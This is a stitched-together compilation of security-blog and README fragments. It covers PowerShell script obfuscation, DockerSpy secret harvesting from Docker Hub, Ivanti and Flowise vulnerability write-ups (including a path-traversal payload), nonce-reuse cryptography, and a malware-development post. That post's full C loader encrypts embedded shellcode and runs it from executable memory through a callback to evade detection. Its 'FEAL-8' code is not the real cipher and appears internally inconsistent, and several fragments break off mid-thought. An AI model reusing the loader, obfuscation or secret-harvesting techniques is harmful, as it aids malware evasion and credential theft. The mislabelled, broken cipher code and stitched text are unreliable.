The obfuscation levels are divided into 5 options. First, you need to have a PowerShell file that you want to obfuscate. Let's assume you have a file named script.ps1 with the following content:
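As an illustration (my own example, not part of the original README), a trivial script and the corresponding level 1 invocation based on the usage shown above could look like this:

# script.ps1 (example content)
Write-Host "Hello, World!"

./obfuscator -i script.ps1 -o obfuscated_level1.ps1 -level 1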
This will generate a file named obfuscated_level1.ps1 with the obfuscated content. The result will be a version of your script where each character is separated by commas and combined at runtime. Result (level 1)
This will generate a file named obfuscated_level2.ps1 with the content encoded in base64. When executing this script, it will be decoded and run at runtime. Result (level 2)
This level compresses the script before encoding it in base64, making analysis more complicated. The result will be decoded and decompressed at runtime. Result (level 4)
Many native OS PE files still rely on delayed imports. When APIs imported this way are called for the first time, a so-called delay load helper function is executed first – it loads the actual delayed library, resolves the address …
DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.
What is Docker?
Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.
About Docker Hub
Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.
Why OSINT on Docker Hub?
Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:
Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.
Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.
Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.
Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.
Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.
Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.
DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contribution
Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
About the Author
DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
Back to the Basics: MiniDumpWriteDump The most common way of dumping the memory of a process is to call MiniDumpWriteDump. It requires a process handle with sufficient access rights, a process ID, a handle to an output file, and a value representing the “dump type” (such as MiniDumpWithFullMemory). BOOL MiniDumpWriteDump( [in] HANDLE hProcess, // Target pro...
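For reference, a minimal sketch of calling the documented API (illustrative only, not the post's code): it writes a full dump of the current process to a file and links against Dbghelp.lib.

#include <windows.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")

int main(void) {
    // open the output file that will receive the minidump
    HANDLE hFile = CreateFileW(L"self.dmp", GENERIC_WRITE, 0, NULL,
                               CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) return 1;

    // process handle, process ID, output file handle, and dump type, as described above
    BOOL ok = MiniDumpWriteDump(GetCurrentProcess(), GetCurrentProcessId(), hFile,
                                MiniDumpWithFullMemory, NULL, NULL, NULL);
    CloseHandle(hFile);
    return ok ? 0 : 1;
}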
We initially wrote this post in reference to CVE-2024-29847; however, this post actually describes CVE-2023-28324. We had incorrectly assumed that the SU5 update was comprehensive, which resulted in us mistaking CVE-2023-28324 for CVE-2024-29847. The content of this blog has been updated accordingly.
Introduction
Ivanti Endpoint Manager (EPM) is an enterprise endpoint management solution that allows for centralized management of devices within an organization. On June 7th, 2023, Ivanti released an advisory describing an improper input validation vulnerability resulting in remote code execution, with a CVSS score of 9.8. In this post we detail the internal workings of this vulnerability. Our POC can be found here.
AgentPortal
The vulnerability exists in a service named AgentPortal. A quick search shows us that we can find the file at C:\Program Files\LanDesk\ManagementSuite\AgentPortal.exe. Upon further investigation, we find that it is a .NET binary.
AgentPortal.exe Details
After loading AgentPortal.exe into JetBrains dotPeek for decompilation, we find that it's not a very complicated program. Its main responsibility is creating a .NET Remoting service for the IAgentPortal interface.
AgentPortal OnStart
IAgentPortal Interface
The IAgentPortal interface is pretty simple: it consists of functions to create requests, and other functions to get the results and check the status of those requests. Digging into what kind of requests we can make, we find the ActionEnum enum.
ActionEnum
We are immediately drawn to the RunProgram option. The handler for that option shows a very easy way for an attacker to run an arbitrary program.
ProcessRunProgramAction
The Fix
The fix for this vulnerability restricts the programs that can be run by ProcessRunProgramAction to ping.exe and tracert.exe.
ProcessRunProgramAction fix
Indicators of Compromise
The port used by the AgentPortal service can be found in the registry at Computer\HKEY_LOCAL_MACHINE\SOFTWARE\LANDesk\SharedComponents\LANDeskAgentPortal.
AgentPortal Registry Entry
Any unexpected connections to the AgentPortal address in your environment should be investigated for malicious activity.
CVE-2024–8182 : Accidental Discovery of an Unauthenticated DoS
While reviewing some LLM related products with the team, we came across FlowiseAI.
FlowiseAI is an open-source tool for building conversational AI applications and chatbots. It provides a low-code platform with a visual interface that allows users to create AI workflows by connecting different nodes and components.
Seeing that the product was already affected by several weaknesses, in particular CVE-2024–31621, we thought it would be particularly interesting to see if any other weaknesses could be discovered.
The result was the discovery of several vulnerabilities, including two that have currently been published with CVE numbers.
CVE-2024–8182 : An Unauthenticated Denial of Service
This was discovered by Tenable Research while working on web application security.
This blog post focuses on the second discovery, which turned out to be accidental.
An examination of CVE-2024–31621 reveals that Flowise exposes various unauthenticated endpoints, among which we can find /api/v1/get-upload-file/, which allows a user chatting with a model to retrieve content (e.g., an image) used during a conversation.
When a chat is initiated and it contains a document, a request is made to the URL
Using this endpoint and following the flow of function calls, we come across the streamStorageFile constant, whose purpose is to retrieve the requested file.
In our case, we're not using Bucket (S3) storage, so we fall into the else branch at line 299, which seeks to retrieve a file locally.
An unauthenticated endpoint fetching a local file: the perfect conditions for testing different path traversal cases.
A few remarks about the piece of code we're examining:
// path.join() automatically resolves relative paths and `..` sequences,
// so it "always" creates a normalized path
const filePath = path.join(getStoragePath(), chatflowId, chatId, filename)

// So the checks path.isAbsolute() and filePath.includes() are therefore unnecessary here
if (filePath.includes('..')) throw new Error(`Invalid file path`)
if (!path.isAbsolute(filePath)) throw new Error(`Invalid file path`)
With these three lines, we could say that ultimately the only value that matters is fileName, and that we can place our payload there, such as ../../../etc/passwd.
// path.join() performs the normalization and the value obtained here is now /etc/passwd
const filePath = path.join(getStoragePath(), '1', '2', '/../../../etc/passwd')

// only return from the storage folder
if (!filePath.startsWith(getStoragePath())) throw new Error(`Invalid file path`)
The filePath value must start with a specific path, which by default corresponds to the /root/.flowise/storage folder.
Without going into details, in our case this file is not very interesting, which greatly reduces the impact of the vulnerability.
However, while running a few tests, I noticed at one point that my instance was no longer responding. I had put a simple dot in the fileName parameter.
On the code side, it looks like this:
// path.join() performs the normalization and the value obtained here is now /root/.flowise/storage
const filePath = path.join(getStoragePath(), '.', '.', '.')

// This condition passes because getStoragePath() == filePath
if (!filePath.startsWith(getStoragePath())) throw new Error(`Invalid file path`)

// fs.existsSync checks whether a file or directory exists at the specified location
if (fs.existsSync(filePath)) {
    // fs.createReadStream creates a read stream for the specified file
    return fs.createReadStream(filePath)
} else {
    throw new Error(`File ${fileName} not found`)
}
Among the various problems posed by this implementation, the key one here is that fs.existsSync() doesn't distinguish between a file and a directory, whereas fs.createReadStream() expects to receive a file.
As the value supplied is a directory, an unhandled exception is thrown and the application crashes.
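As a rough illustration of a safer pattern (a sketch of one possible hardening, not the project's actual code and not an official fix), resolving the path, re-checking the prefix, and verifying that the target is a regular file would address both the traversal edge cases and the crash:

const fs = require('fs')
const path = require('path')

// hypothetical hardening sketch; getStoragePath() is assumed from the original code
function streamStoredFile(chatflowId, chatId, fileName) {
    const base = getStoragePath()
    const filePath = path.resolve(base, chatflowId, chatId, fileName)

    // the trailing separator also rejects filePath === base (the "." case above)
    if (!filePath.startsWith(base + path.sep)) throw new Error('Invalid file path')

    // only regular files may reach createReadStream(), so a directory cannot crash the process
    if (!fs.existsSync(filePath) || !fs.statSync(filePath).isFile()) {
        throw new Error('File not found')
    }
    return fs.createReadStream(filePath)
}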
To date, despite several reminders and the acknowledgement of other vulnerabilities, the Flowise team has not followed up and has not informed us of a potential fix.
If you’ve encountered cryptography software, you’ve probably heard the advice to never use a nonce twice—in fact, that’s where the word nonce (number used once) comes from. Depending on the cryptography involved, a reused nonce can reveal encrypted messages, or even leak your secret key! But common knowledge may not cover every possible way to accidentally reuse nonces. Sometimes, the techniques that are supposed to prevent nonce reuse have subtle flaws.
This blog post tells a cautionary tale of what can go wrong when implementing a relatively basic type of cryptography: a bidirectional encrypted channel, such as an encrypted voice call or encrypted chat. We’ll explore how more subtle issues of this type can arise in a network with several encrypted channels, and we’ll describe a bug we discovered in a client’s threshold signature scheme. In that implementation, none of the parties involved ever used the same nonce twice. However, because they used the same sequence of nonce values, two different senders could accidentally use the same nonce as each other. An attacker could have used this issue to tamper with messages, or make honest parties appear malicious.
Figure 1: Don’t let your drunk friend drive, or use your nonce!
How we make encrypted channels
Encrypting messages—making the meaning of a message hidden, even to a third party that has full access to the content of a message—is probably the oldest activity we’d recognize as “cryptography.” The core structure of today’s message encryption stretches back at least to the polyalphabetic ciphers of the 1500s, and goes as follows:
To encrypt:
Take the secret message and separate it into regular-sized sections (or “blocks”). The overall data in each section is treated as a single “symbol.”
Substitute each symbol with a different symbol, depending on the secret, the position in the message, and possibly also on previous symbols in the message.
Send the now-encrypted message.
To decrypt:
Take the encrypted message, and separate it into blocks.
Substitute each symbol using the reverse of the encryption procedure, again using the secret, the position, and possibly the previous symbols.
Read the now-decrypted message.
The security of this scheme relies on third parties being unable to infer data about the symbol-substitution procedure just by looking at the encrypted data.
Historically, many ciphers have been broken by observing patterns within individual encrypted messages (Alan Turing’s Banburismus technique, which broke the Nazi Navy’s Enigma encryption, is a famous example).
Modern ciphers are designed to completely eliminate these patterns within messages, if properly used. First, our substitution alphabets are much larger—two commonly used stream ciphers, AES-CTR and ChaCha20, use block sizes of 128 and 256 bits, respectively. That means the alphabets have 2^128 and 2^256 symbols, respectively. Next, there are rules used to ensure that every symbol in a message gets a different substitution table. If you treat every symbol in the same way, you risk revealing patterns in the underlying message, as in the classic ECB penguin!
Figure 3: The image after encryption with ECB mode (source)
Finally, and most importantly for this story, you need to ensure that every message is treated differently—which is where nonces come in.
Numbers, but only once
The AES-CTR and ChaCha20 stream ciphers are both "counter-mode" stream ciphers. Counter-mode ciphers use a very simplistic type of substitution table: map the i-th block, with the value x_i, to x_i XOR F(i), where F is a so-called "pseudorandom function" derived from the secret key [1]. To see how this works, let's start again with our trusty image of Tux, and an image generated from AES-CTR's pseudorandom function:
Figure 4: The original image again
Figure 5: Image generated from AES-CTR’s pseudorandom function
When we XOR the pseudorandom image with Tux, Tux vanishes in the noise:
Figure 6: XOR of the pseudorandom image with Tux
It might not be obvious that this actually still has Tux in it—but if you closely watch the animation below, you can see the outline of Tux as it switches from the original noise to the encrypted version of Tux:
Figure 7: Animation of mixing Tux with the AES-CTR output; notice the visible outline of Tux
And if we XOR this with the noise again, Tux returns!
Figure 8: Tux visible again after XOR
This lets us both encrypt and decrypt data, so long as you know the function F used to generate the pseudorandom data.
But if we aren’t careful, we might reveal too much. Let’s start with a different image, but the same noise:
If we XOR the image and the noise together, Beastie, like Tux, vanishes:
Figure 11: Beastie disappears in noise
But if we now XOR these two encrypted messages, suddenly we can tell what they originally were!
Figure 12: Beastie and Tux reappear when the two encrypted messages are XORed
What went wrong? Well, we used the exact same noise in each encrypted message. In real encrypted channels, the pseudorandom function F we use to generate our noise gets an extra parameter, called the "nonce," or "number used once." As the name suggests, that number should be unique for each message. If you ever reuse a nonce, a third party who sees two encrypted messages can learn the XOR of the plaintexts. However, so long as you never reuse a nonce, a good pseudorandom function will generate completely different noise given two different nonces [2]. By tweaking the above experiment to use the nonce 1 for Tux and the nonce 2 for the Beastie, the XOR of the two messages is still incomprehensible noise:
Figure 13: Encrypted Tux
Figure 14: Encrypted Beastie
Figure 15: XOR of the previous two images
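A small sketch makes the difference concrete (assuming Python's cryptography package; the key, nonces, and messages are made up). With the same key and nonce, the keystream cancels out and the XOR of the ciphertexts equals the XOR of the plaintexts, exactly as with the images above; with distinct nonces it does not.

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms
import os

def chacha20(key, nonce, data):
    # this ChaCha20 construction takes a 256-bit key and a 128-bit nonce/counter block
    return Cipher(algorithms.ChaCha20(key, nonce), mode=None).encryptor().update(data)

key = os.urandom(32)
nonce = bytes(16)                      # the same nonce, reused for both messages
p1, p2 = b"attack at dawn!!", b"retreat at noon!"

c1 = chacha20(key, nonce, p1)
c2 = chacha20(key, nonce, p2)
xor = bytes(a ^ b for a, b in zip(c1, c2))
assert xor == bytes(a ^ b for a, b in zip(p1, p2))   # the XOR of the plaintexts leaks

c3 = chacha20(key, (1).to_bytes(16, "little"), p2)   # a different nonce
assert bytes(a ^ b for a, b in zip(c1, c3)) != bytes(a ^ b for a, b in zip(p1, p2))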
Which brings us to the bug.
The bug
Our client was implementing a threshold signature scheme. The signing process in a threshold signature scheme requires a lot of communication between all parties. Some communication is broadcast, and some is peer-to-peer. For security, the peer-to-peer communication needs to be both private and tamper-resistant, so the implementation uses an authenticated encryption scheme called ChaCha20-Poly1305, which combines the ChaCha20 stream cipher with Poly1305, a Polynomial Message Authentication Code.
Let’s consider a three-party example with Alice, Bob, and Carol. To create her peer-to-peer channels, Alice establishes two different shared secrets, s_B and s_C, with Bob and with Carol respectively, via Diffie-Hellman key exchange. Then, Alice sets up a global “nonce counter”: every time Alice sends a message, she sends it with the current value of the counter, then increments the counter. That way she will absolutely never send two messages with the same nonce, even on different channels!
Unfortunately, all parties initialize the counter at the same value (0), increment it at the same rate, and send messages in the same order. So in the first step, when Alice sends a message to Bob, and Bob sends a message to Alice, they both use the secret s_B and the nonce 0! So an eavesdropper who intercepts both these messages can learn their XORed contents. Likewise, Bob and Carol will send each other messages with nonce 1, and then in the next round Alice and Bob will both use nonce 2. Alice and Carol will always use different nonces to each other, however—Alice is Carol’s first recipient, and Carol is Alice’s second—so the Alice-to-Carol nonces will always be odd and the Carol-to-Alice nonces will always be even.
In the actual system where this bug occurred, the messages that use the same nonce happen to be very structured and the important fields that get XORed are, themselves, pseudorandom. This meant that an eavesdropper couldn’t learn enough to perform a direct exploit using these messages. However, this particular nonce reuse did leak the message-authentication key, and would have allowed a person in the middle to tamper with certain messages and cause other participants to treat honest parties as potentially malicious.
How to fix it
Whenever you have a communication channel, it’s extremely important to properly manage the nonces involved to ensure that no nonce is ever repeated. A quick-and-dirty method would be to divide the space of nonces between parties. In the example above, Alice and Carol coincidentally always had different nonce parity, and you could make that deliberate: in each channel, you have some way to designate one party as “odd” and one party as “even,” and then, to send the message with the nonce n, you actually use 2n if you’re the even party, and 2n+1 if you’re the odd one³.
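A sketch of that quick-and-dirty partitioning in C (the party's "odd"/"even" role would come from the channel setup; the function name is ours, purely for illustration):

    #include <stdint.h>

    // Map a per-party message counter n to the nonce actually used on the wire,
    // so the "even" and "odd" parties on one channel can never collide.
    uint64_t wire_nonce(uint64_t n, int is_odd_party) {
        return 2 * n + (is_odd_party ? 1 : 0);   // costs one bit of nonce space
    }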
However, a much better scheme is to have entirely separate keys for each direction: in other words, Alice encrypts messages to Bob with a secret s_AB and decrypts messages from Bob with s_BA. Likewise, Bob encrypts with s_BA and decrypts with s_AB. This is what is done by the Noise Protocol Framework, which requires that you use different CipherState objects for sending and receiving. There are a few different ways to derive these “directional keys” from a single shared secret, but generally, we recommend using a well-vetted existing implementation of a well-vetted scheme, like the Noise Protocol Framework. Many of these issues have been proactively handled in such implementations.
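The idea behind directional keys is simply to derive two sub-keys from the one shared secret, one per direction. The sketch below assumes a generic kdf() helper (any well-vetted KDF, such as HKDF, would fill that role); it illustrates the idea only and is not the Noise Protocol Framework's actual key schedule:

    #include <stdint.h>
    #include <stddef.h>

    // Hypothetical KDF helper: derives out_len bytes from `secret` and a context label.
    void kdf(const uint8_t *secret, size_t secret_len,
             const char *label, uint8_t *out, size_t out_len);

    void derive_directional_keys(const uint8_t *shared_secret, size_t len,
                                 uint8_t s_ab[32], uint8_t s_ba[32]) {
        // Alice encrypts with s_ab and decrypts with s_ba; Bob does the opposite.
        kdf(shared_secret, len, "A->B", s_ab, 32);
        kdf(shared_secret, len, "B->A", s_ba, 32);
    }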
Don’t reuse nonces!
At the end of the day, it’s important to evaluate every assumption and restriction of a cryptographic system carefully, and to make sure that all your mitigations actually address the threat as it is. An easy mental simplification of nonce reuse is “don’t send two messages with the same nonce”—and in that simplified model, the global nonce counter works! However, the actual threat of nonce reuse doesn’t care who sends the message—and if anyone sends a message with the same key and nonce, you’re at risk.
Most prominent encrypted-channel libraries handle this safely, but if you find you need to implement a solution like this, consider reaching out to us for a cryptographic review.
¹ Although this is a faithful description of counter-mode encryption, many functions that are called “pseudorandom” are completely unsuitable for use in encryption. Whenever possible, use well-vetted stream ciphers and follow industry best practices.
² Some encryption schemes have various restrictions beyond just avoiding nonce reuse – in some schemes, having overly long messages can lead to nonce-reuse-like issues. Some schemes have different recommendations depending on whether you generate nonces randomly or with a counter. In general, please use a well-vetted encryption implementation and ensure that you follow all recommendations in the relevant specification or standard.
³ This requires decreasing the effective nonce size by 1 bit, so in general, we don’t recommend it!
Hello, cybersecurity enthusiasts and white hackers!
This post is the result of my own research on using the FEAL-8 block cipher in malware development. As usual, while exploring various crypto algorithms, I decided to check what would happen if we apply this one to encrypt and decrypt the payload.
FEAL
Akihiro Shimizu and Shoji Miyaguchi from NTT Japan developed this algorithm. It uses a 64-bit block and a 64-bit key. The goal was to create an algorithm similar to DES but with a stronger round function, so that fewer rounds would be needed and the algorithm could run faster. Unfortunately, reality did not meet the design objectives.
The encryption procedure begins with a 64-bit chunk of plaintext. First, the data block is XORed with 64 bits of key material. The data block is then divided into left and right halves. The left half is combined with the right half to create a new right half. The left and new right halves go through n rounds (four at first). In each round, the right half is combined with 16 bits of key material (via function f) and then XORed with the left half to create the new right half. The new left half is formed from the original right half (before the round). After n rounds (remember not to switch the left and right halves after the nth round), the left half is XORed with the right half to create a new right half, which is then concatenated with the left half to produce a 64-bit whole. The data block is XORed with another 64 bits of key material before the algorithm concludes.
practical example
First of all, we need a rotl function:
// rotate a 32-bit value left by `shift` bits
uint32_t rotl(uint32_t x, int shift) {
    return (x << shift) | (x >> (32 - shift));
}
This function performs a left bitwise rotation on a 32-bit unsigned integer (x). It shifts the bits of x to the left by a specified number of positions (shift), while the bits that overflow on the left side are moved to the right side. Bitwise rotations are commonly used in cryptographic algorithms to introduce diffusion and obfuscate patterns in data.
The next one is the F function:
uint32_t F(uint32_t x1, uint32_t x2) {
    return rotl((x1 ^ x2), 2);
}
This function is the core mixing function in the FEAL-8 algorithm. It takes two 32-bit values (x1 and x2), applies a bitwise XOR (^) to them, and then rotates the result to the left by 2 bits using the previously defined rotl function. This helps to increase the nonlinearity of the encryption process.
The next one is the G function:
// function G used in FEAL-8
void G(uint32_t *left, uint32_t *right, uint8_t *roundKey) {
    uint32_t tempLeft = *left;
    *left = *right;
    *right = tempLeft ^ F(*left, *right) ^ *(uint32_t *)roundKey;
}
The G function is the main transformation function in each round of FEAL-8. It operates on the left and right halves of the data block. It performs the following steps:
Saves the left half (tempLeft).
Sets the left half equal to the right half (*left = *right).
Updates the right half with the XOR of tempLeft, the result of the F function, and the round key.
This function performs the key transformations in each round of FEAL-8 and introduces the necessary diffusion and confusion in the data block. The XOR operation and the F function help mix the data and make the encryption resistant to attacks.
The key schedule function generates a series of round subkeys from the main encryption key (key). It creates a different subkey for each of the 8-rounds of FEAL-8. In each round, the key schedule performs an XOR operation between each byte of the key and the sum of the round index (i) and the byte index (j):
// key schedule for FEAL-8
void key_schedule(uint8_t *key) {
    for (int i = 0; i < ROUNDS; i++) {
        for (int j = 0; j < 8; j++) {
            K[i][j] = key[j] ^ (i + j);
        }
    }
}
Then, the next one is encryption logic:
// FEAL-8 encryption function
void feal8_encrypt(uint32_t *block, uint8_t *key) {
    uint32_t left = block[0], right = block[1];
    // perform 8 rounds of encryption
    for (int i = 0; i < ROUNDS; i++) {
        G(&left, &right, K[i]);
    }
    // final swapping of left and right
    block[0] = right;
    block[1] = left;
}
This function performs FEAL-8 encryption on a 64-bit data block (split into two 32-bit halves: left and right). It performs 8 rounds of encryption by applying the G function with the appropriate round key in each round.
Decryption logic:
// FEAL-8 decryption function
void feal8_decrypt(uint32_t *block, uint8_t *key) {
    uint32_t left = block[0], right = block[1];
    // perform 8 rounds of decryption in reverse
    for (int i = ROUNDS - 1; i >= 0; i--) {
        G(&left, &right, K[i]);
    }
    // final swapping of left and right
    block[0] = right;
    block[1] = left;
}
And shellcode encryption and decryption logic:
// function to encrypt shellcode using FEAL-8
void feal8_encrypt_shellcode(unsigned char *shellcode, int shellcode_len, uint8_t *key) {
    key_schedule(key); // Generate subkeys
    int i;
    uint32_t *ptr = (uint32_t *)shellcode;
    for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
        feal8_encrypt(ptr, key);
        ptr += 2;
    }
    // handle remaining bytes by padding with 0x90 (NOP)
    int remaining = shellcode_len % BLOCK_SIZE;
    if (remaining != 0) {
        unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
        memcpy(pad, ptr, remaining);
        feal8_encrypt((uint32_t *)pad, key);
        memcpy(ptr, pad, remaining);
    }
}

// function to decrypt shellcode using FEAL-8
void feal8_decrypt_shellcode(unsigned char *shellcode, int shellcode_len, uint8_t *key) {
    key_schedule(key); // Generate subkeys
    int i;
    uint32_t *ptr = (uint32_t *)shellcode;
    for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
        feal8_decrypt(ptr, key);
        ptr += 2;
    }
    // handle remaining bytes with padding
    int remaining = shellcode_len % BLOCK_SIZE;
    if (remaining != 0) {
        unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
        memcpy(pad, ptr, remaining);
        feal8_decrypt((uint32_t *)pad, key);
        memcpy(ptr, pad, remaining);
    }
}
The first function is responsible for encrypting the provided shellcode (a meow-meow messagebox in our case) using FEAL-8 encryption. It processes the shellcode in 64-bit blocks (8 bytes), and if there are any remaining bytes that do not fit into a full block, it pads them with 0x90 (NOP) before encrypting.
Finally, the main function demonstrates encrypting, decrypting, and executing shellcode using FEAL-8: the decrypted payload is executed using the EnumDesktopsA function.
The full source code looks like this (hack.c):
/*
* hack.c
* encrypt/decrypt payload via FEAL-8 algorithm
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2024/09/12/malware-cryptography-32.html
*/
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

#define ROUNDS 8     // FEAL-8 uses 8 rounds of encryption
#define BLOCK_SIZE 8 // FEAL-8 operates on 64-bit (8-byte) blocks

// subkeys generated from the main key
uint8_t K[ROUNDS][8];

// rotate a 32-bit value left by `shift` bits
uint32_t rotl(uint32_t x, int shift) {
    return (x << shift) | (x >> (32 - shift));
}

// function F used in FEAL-8
uint32_t F(uint32_t x1, uint32_t x2) {
    return rotl((x1 ^ x2), 2);
}

// function G used in FEAL-8
void G(uint32_t *left, uint32_t *right, uint8_t *roundKey) {
    uint32_t tempLeft = *left;
    *left = *right;
    *right = tempLeft ^ F(*left, *right) ^ *(uint32_t *)roundKey;
}

// key schedule for FEAL-8
void key_schedule(uint8_t *key) {
    for (int i = 0; i < ROUNDS; i++) {
        for (int j = 0; j < 8; j++) {
            K[i][j] = key[j] ^ (i + j);
        }
    }
}

// FEAL-8 encryption function
void feal8_encrypt(uint32_t *block, uint8_t *key) {
    uint32_t left = block[0], right = block[1];
    // perform 8 rounds of encryption
    for (int i = 0; i < ROUNDS; i++) {
        G(&left, &right, K[i]);
    }
    // final swapping of left and right
    block[0] = right;
    block[1] = left;
}

// FEAL-8 decryption function
void feal8_decrypt(uint32_t *block, uint8_t *key) {
    uint32_t left = block[0], right = block[1];
    // perform 8 rounds of decryption in reverse
    for (int i = ROUNDS - 1; i >= 0; i--) {
        G(&left, &right, K[i]);
    }
    // final swapping of left and right
    block[0] = right;
    block[1] = left;
}

// function to encrypt shellcode using FEAL-8
void feal8_encrypt_shellcode(unsigned char *shellcode, int shellcode_len, uint8_t *key) {
    key_schedule(key); // Generate subkeys
    int i;
    uint32_t *ptr = (uint32_t *)shellcode;
    for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
        feal8_encrypt(ptr, key);
        ptr += 2;
    }
    // handle remaining bytes by padding with 0x90 (NOP)
    int remaining = shellcode_len % BLOCK_SIZE;
    if (remaining != 0) {
        unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
        memcpy(pad, ptr, remaining);
        feal8_encrypt((uint32_t *)pad, key);
        memcpy(ptr, pad, remaining);
    }
}

// function to decrypt shellcode using FEAL-8
void feal8_decrypt_shellcode(unsigned char *shellcode, int shellcode_len, uint8_t *key) {
    key_schedule(key); // Generate subkeys
    int i;
    uint32_t *ptr = (uint32_t *)shellcode;
    for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
        feal8_decrypt(ptr, key);
        ptr += 2;
    }
    // handle remaining bytes with padding
    int remaining = shellcode_len % BLOCK_SIZE;
    if (remaining != 0) {
        unsigned char pad[BLOCK_SIZE] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
        memcpy(pad, ptr, remaining);
        feal8_decrypt((uint32_t *)pad, key);
        memcpy(ptr, pad, remaining);
    }
}

int main() {
    unsigned char my_payload[] =
        "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
        "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
        "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
        "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
        "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
        "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
        "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
        "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
        "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
        "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
        "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
        "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
        "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
        "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
        "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
        "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
        "\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
        "\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
        "\x2e\x2e\x5e\x3d\x00";
    int my_payload_len = sizeof(my_payload);
    int pad_len = my_payload_len + (BLOCK_SIZE - my_payload_len % BLOCK_SIZE) % BLOCK_SIZE;
    unsigned char padded[pad_len];
    memset(padded, 0x90, pad_len); // pad with NOPs
    memcpy(padded, my_payload, my_payload_len);

    printf("original shellcode:\n");
    for (int i = 0; i < my_payload_len; i++) {
        printf("%02x ", my_payload[i]);
    }
    printf("\n\n");

    uint8_t key[8] = {0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0};

    feal8_encrypt_shellcode(padded, pad_len, key);
    printf("encrypted shellcode:\n");
    for (int i = 0; i < pad_len; i++) {
        printf("%02x ", padded[i]);
    }
    printf("\n\n");

    feal8_decrypt_shellcode(padded, pad_len, key);
    printf("decrypted shellcode:\n");
    for (int i = 0; i < my_payload_len; i++) {
        printf("%02x ", padded[i]);
    }
    printf("\n\n");

    // allocate and execute decrypted shellcode
    LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    RtlMoveMemory(mem, padded, my_payload_len);
    EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);

    return 0;
}
